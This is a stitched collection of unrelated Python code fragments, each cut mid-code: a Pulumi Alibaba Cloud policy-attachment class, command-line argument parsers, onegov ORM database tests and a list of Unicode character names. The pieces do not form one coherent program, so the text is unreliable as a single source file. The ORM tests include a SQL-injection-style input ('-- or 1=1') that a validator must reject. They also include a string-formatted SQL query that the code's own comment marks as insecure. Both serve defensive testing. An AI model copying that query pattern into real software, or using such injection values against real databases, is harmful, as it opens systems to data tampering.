:param pulumi.Input[str] resource_group_id: The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PolicyAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Resource Manager Policy Attachment resource to attaches a policy to an object. After you attach a policy to an object, the object has the operation permissions on the current resource group or the resources under the current account.
For information about Resource Manager Policy Attachment and how to use it, see [How to authorize and manage resource groups](https://www.alibabacloud.com/help/en/doc-detail/94490.htm).
> **NOTE:** Available in v1.93.0+.
## Import
Resource Manager Policy Attachment can be imported using the id, e.g.
```sh
$ pulumi import alicloud:resourcemanager/policyAttachment:PolicyAttachment example tf-testaccrdpolicy:Custom:tf-testaccrdpolicy@11827252********.onaliyun.com:IMSUser:rg******
```
:param str resource_name: The name of the resource.
:param PolicyAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PolicyAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
policy_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
principal_name: Optional[pulumi.Input[str]] = None,
principal_type: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PolicyAttachmentArgs.__new__(PolicyAttachmentArgs)
if policy_name is None and not opts.urn:
raise TypeError("Missing required property 'policy_name'")
__props__.__dict__["policy_name"] = policy_name
if policy_type is None and not opts.urn:
raise TypeError("Missing required property 'policy_type'")
__props__.__dict__["policy_type"] = policy_type
if principal_name is None and not opts.urn:
raise TypeError("Missing required property 'principal_name'")
__props__.__dict__["principal_name"] = principal_name
if principal_type | |
str, An inclusive lower bound for values.
upper_bound: str, An inclusive upper bound for values.
Raises:
ArgumentTypeError: If either the lower_bound or upper_bound
cannot be parsed. The returned function will also raise this
error if it cannot parse its input. This exception is also
raised if the returned function receives an out-of-bounds
input.
Returns:
A function that accepts a single time duration as input to be
parsed.
"""
def Parse(value):
"""Parses a duration from value and returns integer seconds."""
try:
return int(
times.ParseDuration(value, default_suffix=default_unit).total_seconds)
except times.Error as e:
message = six.text_type(e).rstrip('.')
raise ArgumentTypeError(_GenerateErrorMessage(
'Failed to parse duration: {0}'.format(message, user_input=value)))
parsed_lower_bound = Parse(lower_bound)
if upper_bound is None:
parsed_upper_bound = None
else:
parsed_upper_bound = Parse(upper_bound)
def ParseWithBoundsChecking(value):
"""Same as Parse except bound checking is performed."""
if value is None:
return None
parsed_value = Parse(value)
if parsed_lower_bound is not None and parsed_value < parsed_lower_bound:
raise ArgumentTypeError(_GenerateErrorMessage(
'value must be greater than or equal to {0}'.format(lower_bound),
user_input=value))
if parsed_upper_bound is not None and parsed_value > parsed_upper_bound:
raise ArgumentTypeError(_GenerateErrorMessage(
'value must be less than or equal to {0}'.format(upper_bound),
user_input=value))
return parsed_value
return ParseWithBoundsChecking
def BinarySize(lower_bound=None, upper_bound=None,
suggested_binary_size_scales=None, default_unit='G',
type_abbr='B'):
"""Returns a function that can parse binary sizes.
Binary sizes are defined as base-2 values representing number of
bytes.
Input to the parsing function must be a string of the form:
INTEGER[UNIT]
The integer must be non-negative. Valid units are "B", "KB", "MB",
"GB", "TB", "KiB", "MiB", "GiB", "TiB", "PiB". If the unit is
omitted then default_unit is assumed.
The result is parsed in bytes. For example:
parser = BinarySize()
assert parser('10GB') == 1073741824
Args:
lower_bound: str, An inclusive lower bound for values.
upper_bound: str, An inclusive upper bound for values.
suggested_binary_size_scales: list, A list of strings with units that will
be recommended to user.
default_unit: str, unit used when user did not specify unit.
type_abbr: str, the type suffix abbreviation, e.g., B for bytes, b/s for
bits/sec.
Raises:
ArgumentTypeError: If either the lower_bound or upper_bound
cannot be parsed. The returned function will also raise this
error if it cannot parse its input. This exception is also
raised if the returned function receives an out-of-bounds
input.
Returns:
A function that accepts a single binary size as input to be
parsed.
"""
return _ValueParser(
_BINARY_SIZE_SCALES, default_unit=default_unit, lower_bound=lower_bound,
upper_bound=upper_bound, strict_case=False, type_abbr=type_abbr,
suggested_binary_size_scales=suggested_binary_size_scales)
_KV_PAIR_DELIMITER = '='
class Range(object):
"""Range of integer values."""
def __init__(self, start, end):
self.start = start
self.end = end
@staticmethod
def Parse(string_value):
"""Creates Range object out of given string value."""
match = re.match(_RANGE_PATTERN, string_value)
if not match:
raise ArgumentTypeError('Expected a non-negative integer value or a '
'range of such values instead of "{0}"'
.format(string_value))
start = int(match.group('start'))
end = match.group('end')
if end is None:
end = start
else:
end = int(end)
if end < start:
raise ArgumentTypeError('Expected range start {0} smaller or equal to '
'range end {1} in "{2}"'.format(
start, end, string_value))
return Range(start, end)
def Combine(self, other):
"""Combines two overlapping or adjacent ranges, raises otherwise."""
if self.end + 1 < other.start or self.start > other.end + 1:
raise Error('Cannot combine non-overlapping or non-adjacent ranges '
'{0} and {1}'.format(self, other))
return Range(min(self.start, other.start), max(self.end, other.end))
def __eq__(self, other):
if isinstance(other, Range):
return self.start == other.start and self.end == other.end
return False
def __lt__(self, other):
if self.start == other.start:
return self.end < other.end
return self.start < other.start
def __str__(self):
if self.start == self.end:
return str(self.start)
return '{0}-{1}'.format(self.start, self.end)
class HostPort(object):
"""A class for holding host and port information."""
IPV4_OR_HOST_PATTERN = r'^(?P<address>[\w\d\.-]+)?(:|:(?P<port>[\d]+))?$'
# includes hostnames
IPV6_PATTERN = r'^(\[(?P<address>[\w\d:]+)\])(:|:(?P<port>[\d]+))?$'
def __init__(self, host, port):
self.host = host
self.port = port
@staticmethod
def Parse(s, ipv6_enabled=False):
"""Parse the given string into a HostPort object.
This can be used as an argparse type.
Args:
s: str, The string to parse. If ipv6_enabled and host is an IPv6 address,
it should be placed in square brackets: e.g.
[2001:db8:0:0:0:ff00:42:8329]
or
[2001:db8:0:0:0:ff00:42:8329]:8080
ipv6_enabled: boolean, If True then accept IPv6 addresses.
Raises:
ArgumentTypeError: If the string is not valid.
Returns:
HostPort, The parsed object.
"""
if not s:
return HostPort(None, None)
match = re.match(HostPort.IPV4_OR_HOST_PATTERN, s, re.UNICODE)
if ipv6_enabled and not match:
match = re.match(HostPort.IPV6_PATTERN, s, re.UNICODE)
if not match:
raise ArgumentTypeError(_GenerateErrorMessage(
'Failed to parse host and port. Expected format \n\n'
' IPv4_ADDRESS_OR_HOSTNAME:PORT\n\n'
'or\n\n'
' [IPv6_ADDRESS]:PORT\n\n'
'(where :PORT is optional).',
user_input=s))
elif not match:
raise ArgumentTypeError(_GenerateErrorMessage(
'Failed to parse host and port. Expected format \n\n'
' IPv4_ADDRESS_OR_HOSTNAME:PORT\n\n'
'(where :PORT is optional).',
user_input=s))
return HostPort(match.group('address'), match.group('port'))
class Day(object):
"""A class for parsing a datetime object for a specific day."""
@staticmethod
def Parse(s):
if not s:
return None
try:
return times.ParseDateTime(s, '%Y-%m-%d').date()
except times.Error as e:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Failed to parse date: {0}'.format(six.text_type(e)),
user_input=s))
class Datetime(object):
"""A class for parsing a datetime object in UTC timezone."""
@staticmethod
def Parse(s):
"""Parses a string value into a Datetime object."""
if not s:
return None
try:
return times.ParseDateTime(s)
except times.Error as e:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Failed to parse date/time: {0}'.format(six.text_type(e)),
user_input=s))
class DayOfWeek(object):
"""A class for parsing a day of the week."""
DAYS = ['SUN', 'MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT']
@staticmethod
def Parse(s):
"""Validates and normalizes a string as a day of the week."""
if not s:
return None
fixed = s.upper()[:3]
if fixed not in DayOfWeek.DAYS:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Failed to parse day of week. Value should be one of {0}'.format(
', '.join(DayOfWeek.DAYS)),
user_input=s))
return fixed
def _BoundedType(type_builder, type_description,
lower_bound=None, upper_bound=None, unlimited=False):
"""Returns a function that can parse given type within some bound.
Args:
type_builder: A callable for building the requested type from the value
string.
type_description: str, Description of the requested type (for verbose
messages).
lower_bound: of type compatible with type_builder,
The value must be >= lower_bound.
upper_bound: of type compatible with type_builder,
The value must be <= upper_bound.
unlimited: bool, If True then a value of 'unlimited' means no limit.
Returns:
A function that can parse given type within some bound.
"""
def Parse(value):
"""Parses value as a type constructed by type_builder.
Args:
value: str, Value to be converted to the requested type.
Raises:
ArgumentTypeError: If the provided value is out of bounds or unparsable.
Returns:
Value converted to the requested type.
"""
if unlimited and value == 'unlimited':
return None
try:
v = type_builder(value)
except ValueError:
raise ArgumentTypeError(
_GenerateErrorMessage('Value must be {0}'.format(type_description),
user_input=value))
if lower_bound is not None and v < lower_bound:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Value must be greater than or equal to {0}'.format(lower_bound),
user_input=value))
if upper_bound is not None and upper_bound < v:
raise ArgumentTypeError(
_GenerateErrorMessage(
'Value must be less than or equal to {0}'.format(upper_bound),
user_input=value))
return v
return Parse
def BoundedInt(*args, **kwargs):
return _BoundedType(int, 'an integer', *args, **kwargs)
def BoundedFloat(*args, **kwargs):
return _BoundedType(float, 'a floating point number', *args, **kwargs)
def _TokenizeQuotedList(arg_value, delim=','):
"""Tokenize an argument into a list.
Args:
arg_value: str, The raw argument.
delim: str, The delimiter on which to split the argument string.
Returns:
[str], The tokenized list.
"""
if arg_value:
if not arg_value.endswith(delim):
arg_value += delim
return arg_value.split(delim)[:-1]
return []
class ArgType(object):
"""Base class for arg types."""
class ArgBoolean(ArgType):
"""Interpret an argument value as a bool."""
def __init__(
self, truthy_strings=None, falsey_strings=None, case_sensitive=False):
self._case_sensitive = case_sensitive
if truthy_strings:
self._truthy_strings = truthy_strings
else:
self._truthy_strings = ['true', 'yes']
if falsey_strings:
self._falsey_strings = falsey_strings
else:
self._falsey_strings = ['false', 'no']
def __call__(self, arg_value):
if not self._case_sensitive:
normalized_arg_value = arg_value.lower()
else:
normalized_arg_value = arg_value
if normalized_arg_value in self._truthy_strings:
return True
if normalized_arg_value in self._falsey_strings:
return False
raise ArgumentTypeError(
'Invalid flag value [{0}], expected one of [{1}]'.format(
arg_value,
', '.join(self._truthy_strings + self._falsey_strings)
)
)
class ArgList(ArgType):
"""Interpret an argument value as a list.
Intended to be used as the type= for a flag argument. Splits the string on
commas or another delimiter and returns a list.
By default, splits on commas:
'a,b,c' -> ['a', 'b', 'c']
There is an available syntax for using an alternate delimiter:
'^:^a,b:c' -> ['a,b', 'c']
'^::^a:b::c' -> ['a:b', 'c']
'^,^^a^,b,c' -> ['^a^', ',b', 'c']
"""
DEFAULT_DELIM_CHAR = ','
ALT_DELIM_CHAR = '^'
def __init__(self, element_type=None, min_length=0, max_length=None,
choices=None):
| |
import morepath
import pytest
import pickle
import sqlalchemy
import time
import transaction
import uuid
from datetime import datetime
from dogpile.cache.api import NO_VALUE
from onegov.core.framework import Framework
from onegov.core.orm import (
ModelBase, SessionManager, as_selectable, translation_hybrid, find_models
)
from onegov.core.orm.abstract import AdjacencyList
from onegov.core.orm.abstract import Associable, associated
from onegov.core.orm.func import unaccent
from onegov.core.orm.mixins import meta_property
from onegov.core.orm.mixins import content_property
from onegov.core.orm.mixins import dict_property
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm import orm_cached
from onegov.core.orm.types import HSTORE, JSON, UTCDateTime, UUID
from onegov.core.orm.types import LowercaseText
from onegov.core.security import Private
from onegov.core.utils import scan_morepath_modules
from psycopg2.extensions import TransactionRollbackError
from pytz import timezone
from sqlalchemy import Column, Integer, Text, ForeignKey, func, select, and_
from sqlalchemy.exc import OperationalError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy.orm import relationship
from sqlalchemy.orm.exc import DetachedInstanceError
from sqlalchemy_utils import aggregated
from threading import Thread
from webob.exc import HTTPUnauthorized, HTTPConflict
from webtest import TestApp as Client
class PicklePage(AdjacencyList):
__tablename__ = 'picklepages'
def test_is_valid_schema(postgres_dsn):
mgr = SessionManager(postgres_dsn, None)
assert not mgr.is_valid_schema('pg_test')
assert not mgr.is_valid_schema('-- or 1=1')
assert not mgr.is_valid_schema('0')
assert not mgr.is_valid_schema('information_schema')
assert not mgr.is_valid_schema('public')
assert not mgr.is_valid_schema('my--schema')
assert mgr.is_valid_schema('my_schema')
assert mgr.is_valid_schema('my-schema')
def test_independent_sessions(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'document'
id = Column(Integer, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('foo')
s1 = mgr.session()
s1.add(Document())
s1.flush()
mgr.set_current_schema('bar')
s2 = mgr.session()
assert s1 is not s2
assert s1.query(Document).count() == 1
assert s2.query(Document).count() == 0
mgr.dispose()
def test_independent_managers(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'document'
id = Column(Integer, primary_key=True)
one = SessionManager(postgres_dsn, Base)
two = SessionManager(postgres_dsn, Base)
one.set_current_schema('foo')
two.set_current_schema('foo')
assert one.session() is not two.session()
assert one.session() is one.session()
assert two.session() is two.session()
one.session().add(Document())
one.session().flush()
assert one.session().query(Document).count() == 1
assert two.session().query(Document).count() == 0
one.set_current_schema('bar')
one.session().info == {'schema': 'bar'}
two.session().info == {'schema': 'foo'}
one.dispose()
two.dispose()
def test_create_schema(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'document'
id = Column(Integer, primary_key=True)
title = Column(Text)
mgr = SessionManager(postgres_dsn, Base)
# we need a schema to use the session manager and it can't be 'public'
mgr.set_current_schema('testing')
def existing_schemas():
# DO NOT copy this query, it's insecure (which is fine in testing)
return set(
r['schema_name'] for r in mgr.engine.execute(
'SELECT schema_name FROM information_schema.schemata'
)
)
def schema_tables(schema):
# DO NOT copy this query, it's insecure (which is fine in testing)
return set(
r['tablename'] for r in mgr.engine.execute((
"SELECT tablename FROM pg_catalog.pg_tables "
"WHERE schemaname = '{}'".format(schema)
))
)
assert 'testing' in existing_schemas()
assert 'new' not in existing_schemas()
mgr.ensure_schema_exists('new')
assert 'new' in existing_schemas()
assert 'document' in schema_tables('new')
mgr.dispose()
def test_schema_bound_session(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Document(Base):
__tablename__ = 'documents'
id = Column(Integer, primary_key=True)
title = Column(Text)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('foo')
session = mgr.session()
session.add(Document(title='Welcome to Foo'))
transaction.commit()
assert session.query(Document).one().title == 'Welcome to Foo'
mgr.set_current_schema('bar')
session = mgr.session()
assert session.query(Document).first() is None
mgr.set_current_schema('foo')
session = mgr.session()
assert session.query(Document).one().title == 'Welcome to Foo'
mgr.dispose()
def test_session_scope(postgres_dsn):
Base = declarative_base(cls=ModelBase)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('foo')
foo_session = mgr.session()
mgr.set_current_schema('bar')
bar_session = mgr.session()
assert foo_session is not bar_session
mgr.set_current_schema('foo')
foo_session_2 = mgr.session()
mgr.set_current_schema('bar')
bar_session_2 = mgr.session()
assert foo_session is foo_session_2
assert bar_session is bar_session_2
mgr.dispose()
def test_orm_scenario(postgres_dsn, redis_url):
# test a somewhat complete ORM scenario in which create and read data
# for different applications
Base = declarative_base(cls=ModelBase)
class App(Framework):
pass
class Document(Base):
__tablename__ = 'documents'
id = Column(Integer, primary_key=True)
title = Column(Text, nullable=False)
class DocumentCollection(object):
def __init__(self, session):
self.session = session
def query(self):
return self.session.query(Document)
def all(self):
return self.query().all()
def get(self, id):
return self.query().filter(Document.id == id).first()
def add(self, title):
document = Document(title=title)
self.session.add(document)
self.session.flush()
return document
@App.path(model=DocumentCollection, path='documents')
def get_documents(app):
return DocumentCollection(app.session())
@App.json(model=DocumentCollection)
def documents_default(self, request):
return {d.id: d.title for d in self.all()}
@App.json(model=DocumentCollection, name='add', request_method='POST')
def documents_add(self, request):
self.add(title=request.params.get('title'))
@App.json(model=DocumentCollection, name='error')
def documents_error(self, request):
# tries to create a document that should not be created since the
# request as a whole fails
self.add('error')
raise HTTPUnauthorized()
# this is required for the transactions to actually work, usually this
# would be onegov.server's job
scan_morepath_modules(App)
app = App()
app.configure_application(dsn=postgres_dsn, base=Base, redis_url=redis_url)
app.namespace = 'municipalities'
c = Client(app)
# let's try to add some documents to new york
app.set_application_id('municipalities/new-york')
assert c.get('/documents').json == {}
c.post('/documents/add', {'title': 'Welcome to the big apple!'})
assert c.get('/documents').json == {
'1': "Welcome to the big apple!"
}
# after that, we switch to chicago, where a different set of documents
# should exist
app.set_application_id('municipalities/chicago')
assert c.get('/documents').json == {}
c.post('/documents/add', {'title': 'Welcome to the windy city!'})
assert c.get('/documents').json == {
'1': "Welcome to the windy city!"
}
# finally, let's see if the transaction is rolled back if there's an
# error during the course of the request
c.get('/documents/error', expect_errors=True)
assert c.get('/documents').json == {
'1': "Welcome to the windy city!"
}
app.session_manager.dispose()
def test_i18n_with_request(postgres_dsn, redis_url):
Base = declarative_base(cls=ModelBase)
class App(Framework):
pass
class Document(Base):
__tablename__ = 'documents'
id = Column(Integer, primary_key=True)
title_translations = Column(HSTORE, nullable=False)
title = translation_hybrid(title_translations)
@App.path(model=Document, path='document')
def get_document(app):
return app.session().query(Document).first() or Document(id=1)
@App.json(model=Document)
def view_document(self, request):
return {'title': self.title}
@App.json(model=Document, request_method='PUT')
def put_document(self, request):
self.title = request.params.get('title')
app.session().merge(self)
@App.setting(section='i18n', name='default_locale')
def get_i18n_default_locale():
return 'de_CH'
scan_morepath_modules(App)
app = App()
app.configure_application(dsn=postgres_dsn, base=Base, redis_url=redis_url)
app.namespace = 'municipalities'
app.set_application_id('municipalities/new-york')
app.locales = ['de_CH', 'en_US']
c = Client(app)
c.put('/document?title=Dokument')
assert c.get('/document').json == {'title': 'Dokument'}
c.set_cookie('locale', 'en_US')
c.put('/document?title=Document')
assert c.get('/document').json == {'title': 'Document'}
c.set_cookie('locale', '')
assert c.get('/document').json == {'title': 'Dokument'}
app.session_manager.dispose()
def test_json_type(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
data = Column(JSON, nullable=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test(id=1, data=None)
session.add(test)
transaction.commit()
# our json type automatically coreces None to an empty dict
assert session.query(Test).filter(Test.id == 1).one().data == {}
assert session.execute('SELECT data::text from test').scalar() == '{}'
test = Test(id=2, data={'foo': 'bar'})
session.add(test)
transaction.commit()
assert session.query(Test).filter(Test.id == 2).one().data == {
'foo': 'bar'
}
test = session.query(Test).filter(Test.id == 2).one()
test.data['foo'] = 'rab'
transaction.commit()
assert session.query(Test).filter(Test.id == 2).one().data == {
'foo': 'rab'
}
test = Test(id=3, data={})
session.add(test)
transaction.commit()
assert session.query(Test).filter(Test.id == 3).one().data == {}
mgr.dispose()
def test_session_manager_sharing(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
test = Test(id=1)
# session_manager is a weakref proxy so we need to go through some hoops
# to get the actual instance for a proper identity test
assert test.session_manager.__repr__.__self__ is mgr
session = mgr.session()
session.add(test)
transaction.commit()
assert session.query(Test).one().session_manager.__repr__.__self__ is mgr
mgr.dispose()
def test_session_manager_i18n(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
text_translations = Column(HSTORE)
text = translation_hybrid(text_translations)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
mgr.set_locale(default_locale='en_us', current_locale='en_us')
test = Test(id=1, text='no')
assert test.text == 'no'
mgr.set_locale(default_locale='en_us', current_locale='de_ch')
assert test.text == 'no'
test.text_translations['de_ch'] = 'nein'
assert test.text == 'nein'
mgr.set_locale(default_locale='en_us', current_locale='en_us')
assert test.text == 'no'
session = mgr.session()
session.add(test)
transaction.commit()
test = session.query(Test).one()
assert test.text == 'no'
mgr.set_locale(default_locale='en_us', current_locale='de_ch')
assert test.text == 'nein'
# make sure the locale is shared with the query as well
assert mgr.session().query(Test).order_by(Test.text).first()
assert mgr.session().query(Test).filter_by(text='nein').first()
assert not mgr.session().query(Test).filter_by(text='no').first()
mgr.set_locale(default_locale='en_us', current_locale='en_us')
assert not mgr.session().query(Test).filter_by(text='nein').first()
assert mgr.session().query(Test).filter_by(text='no').first()
# make sure session managers are independent
sec = SessionManager(postgres_dsn, Base)
sec.set_current_schema('testing')
mgr.set_locale(default_locale='en_us', current_locale='en_us')
sec.set_locale(default_locale='en_us', current_locale='de_ch')
sec.activate()
assert sec.session().query(Test).one().text == 'nein'
mgr.activate()
assert mgr.session().query(Test).one().text == 'no'
sec.activate()
assert sec.session().query(Test).filter_by(text='nein').first()
mgr.activate()
assert mgr.session().query(Test).filter_by(text='no').first()
sec.dispose()
mgr.dispose()
def test_uuid_type(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(UUID, primary_key=True, default=uuid.uuid4)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test()
session.add(test)
transaction.commit()
assert isinstance(session.query(Test).one().id, uuid.UUID)
mgr.dispose()
def test_lowercase_text(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(LowercaseText, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test()
test.id = 'Foobar'
session.add(test)
transaction.commit()
assert session.query(Test).one().id == 'foobar'
assert session.query(Test).filter(Test.id == 'Foobar').one().id == 'foobar'
assert session.query(Test).filter(Test.id == 'foobar').one().id == 'foobar'
mgr.dispose()
def test_utc_datetime_naive(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
date = Column(UTCDateTime)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
with pytest.raises(sqlalchemy.exc.StatementError):
test = Test(date=datetime.now())
session.add(test)
session.flush()
mgr.dispose()
def test_utc_datetime_aware(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
date = Column(UTCDateTime)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
tz = timezone('Europe/Zurich')
date = datetime(2015, 3, 5, 12, 0).replace(tzinfo=tz)
test = Test(date=date)
session.add(test)
session.flush()
transaction.commit()
assert session.query(Test).one().date == date
mgr.dispose()
def test_timestamp_mixin(postgres_dsn):
Base = declarative_base(cls=ModelBase)
class Test(Base, TimestampMixin):
__tablename__ = 'test'
id = Column(Integer, primary_key=True)
mgr = SessionManager(postgres_dsn, Base)
mgr.set_current_schema('testing')
session = mgr.session()
test = Test()
session.add(test)
session.flush()
transaction.commit()
now | |
None,
'TAI THAM VOWEL SIGN OO': None,
'TAI THAM VOWEL SIGN OY': None,
'TAI THAM VOWEL SIGN TALL AA': None,
'TAI THAM VOWEL SIGN THAM AI': None,
'TAI THAM VOWEL SIGN U': None,
'TAI THAM VOWEL SIGN UE': None,
'TAI THAM VOWEL SIGN UU': None,
'TAI THAM VOWEL SIGN UUE': None,
'TAI VIET LETTER HIGH BO': None,
'TAI VIET LETTER HIGH CHO': None,
'TAI VIET LETTER HIGH CO': None,
'TAI VIET LETTER HIGH DO': None,
'TAI VIET LETTER HIGH FO': None,
'TAI VIET LETTER HIGH GO': None,
'TAI VIET LETTER HIGH HO': None,
'TAI VIET LETTER HIGH KHHO': None,
'TAI VIET LETTER HIGH KHO': None,
'TAI VIET LETTER HIGH KO': None,
'TAI VIET LETTER HIGH LO': None,
'TAI VIET LETTER HIGH MO': None,
'TAI VIET LETTER HIGH NGO': None,
'TAI VIET LETTER HIGH NO': None,
'TAI VIET LETTER HIGH NYO': None,
'TAI VIET LETTER HIGH O': None,
'TAI VIET LETTER HIGH PHO': None,
'TAI VIET LETTER HIGH PO': None,
'TAI VIET LETTER HIGH RO': None,
'TAI VIET LETTER HIGH SO': None,
'TAI VIET LETTER HIGH THO': None,
'TAI VIET LETTER HIGH TO': None,
'TAI VIET LETTER HIGH VO': None,
'TAI VIET LETTER HIGH YO': None,
'TAI VIET LETTER LOW BO': None,
'TAI VIET LETTER LOW CHO': None,
'TAI VIET LETTER LOW CO': None,
'TAI VIET LETTER LOW DO': None,
'TAI VIET LETTER LOW FO': None,
'TAI VIET LETTER LOW GO': None,
'TAI VIET LETTER LOW HO': None,
'TAI VIET LETTER LOW KHHO': None,
'TAI VIET LETTER LOW KHO': None,
'TAI VIET LETTER LOW KO': None,
'TAI VIET LETTER LOW LO': None,
'TAI VIET LETTER LOW MO': None,
'TAI VIET LETTER LOW NGO': None,
'TAI VIET LETTER LOW NO': None,
'TAI VIET LETTER LOW NYO': None,
'TAI VIET LETTER LOW O': None,
'TAI VIET LETTER LOW PHO': None,
'TAI VIET LETTER LOW PO': None,
'TAI VIET LETTER LOW RO': None,
'TAI VIET LETTER LOW SO': None,
'TAI VIET LETTER LOW THO': None,
'TAI VIET LETTER LOW TO': None,
'TAI VIET LETTER LOW VO': None,
'TAI VIET LETTER LOW YO': None,
'TAI VIET MAI KANG': None,
'TAI VIET MAI KHIT': None,
'TAI VIET SYMBOL HO HOI': None,
'TAI VIET SYMBOL KOI KOI': None,
'TAI VIET SYMBOL KON': None,
'TAI VIET SYMBOL NUENG': None,
'TAI VIET SYMBOL SAM': None,
'TAI VIET TONE MAI EK': None,
'TAI VIET TONE MAI NUENG': None,
'TAI VIET TONE MAI SONG': None,
'TAI VIET TONE MAI THO': None,
'TAI VIET VOWEL AA': None,
'TAI VIET VOWEL AM': None,
'TAI VIET VOWEL AN': None,
'TAI VIET VOWEL AUE': None,
'TAI VIET VOWEL AY': None,
'TAI VIET VOWEL E': None,
'TAI VIET VOWEL I': None,
'TAI VIET VOWEL IA': None,
'TAI VIET VOWEL O': None,
'TAI VIET VOWEL U': None,
'TAI VIET VOWEL UA': None,
'TAI VIET VOWEL UE': None,
'TAI VIET VOWEL UEA': None,
'TAMIL AS ABOVE SIGN': None,
'TAMIL CONSONANT C': None,
'TAMIL CONSONANT H': None,
'TAMIL CONSONANT J': None,
'TAMIL CONSONANT K': None,
'TAMIL CONSONANT KSS': None,
'TAMIL CONSONANT L': None,
'TAMIL CONSONANT LL': None,
'TAMIL CONSONANT LLL': None,
'TAMIL CONSONANT M': None,
'TAMIL CONSONANT N': None,
'TAMIL CONSONANT NG': None,
'TAMIL CONSONANT NN': None,
'TAMIL CONSONANT NNN': None,
'TAMIL CONSONANT NY': None,
'TAMIL CONSONANT P': None,
'TAMIL CONSONANT R': None,
'TAMIL CONSONANT RR': None,
'TAMIL CONSONANT S': None,
'TAMIL CONSONANT SH': None,
'TAMIL CONSONANT SS': None,
'TAMIL CONSONANT T': None,
'TAMIL CONSONANT TT': None,
'TAMIL CONSONANT V': None,
'TAMIL CONSONANT Y': None,
'TAMIL CREDIT SIGN': None,
'TAMIL DAY SIGN': None,
'TAMIL DEBIT SIGN': None,
'TAMIL DIGIT ZERO': None,
'TAMIL LETTER SHA': None,
'TAMIL MONTH SIGN': None,
'TAMIL NUMBER SIGN': None,
'TAMIL OM': None,
'TAMIL RUPEE SIGN': None,
'TAMIL SYLLABLE CAA': None,
'TAMIL SYLLABLE CAI': None,
'TAMIL SYLLABLE CAU': None,
'TAMIL SYLLABLE CE': None,
'TAMIL SYLLABLE CEE': None,
'TAMIL SYLLABLE CI': None,
'TAMIL SYLLABLE CII': None,
'TAMIL SYLLABLE CO': None,
'TAMIL SYLLABLE COO': None,
'TAMIL SYLLABLE CU': None,
'TAMIL SYLLABLE CUU': None,
'TAMIL SYLLABLE HAA': None,
'TAMIL SYLLABLE HAI': None,
'TAMIL SYLLABLE HAU': None,
'TAMIL SYLLABLE HE': None,
'TAMIL SYLLABLE HEE': None,
'TAMIL SYLLABLE HI': None,
'TAMIL SYLLABLE HII': None,
'TAMIL SYLLABLE HO': None,
'TAMIL SYLLABLE HOO': None,
'TAMIL SYLLABLE HU': None,
'TAMIL SYLLABLE HUU': None,
'TAMIL SYLLABLE JAA': None,
'TAMIL SYLLABLE JAI': None,
'TAMIL SYLLABLE JAU': None,
'TAMIL SYLLABLE JE': None,
'TAMIL SYLLABLE JEE': None,
'TAMIL SYLLABLE JI': None,
'TAMIL SYLLABLE JII': None,
'TAMIL SYLLABLE JO': None,
'TAMIL SYLLABLE JOO': None,
'TAMIL SYLLABLE JU': None,
'TAMIL SYLLABLE JUU': None,
'TAMIL SYLLABLE KAA': None,
'TAMIL SYLLABLE KAI': None,
'TAMIL SYLLABLE KAU': None,
'TAMIL SYLLABLE KE': None,
'TAMIL SYLLABLE KEE': None,
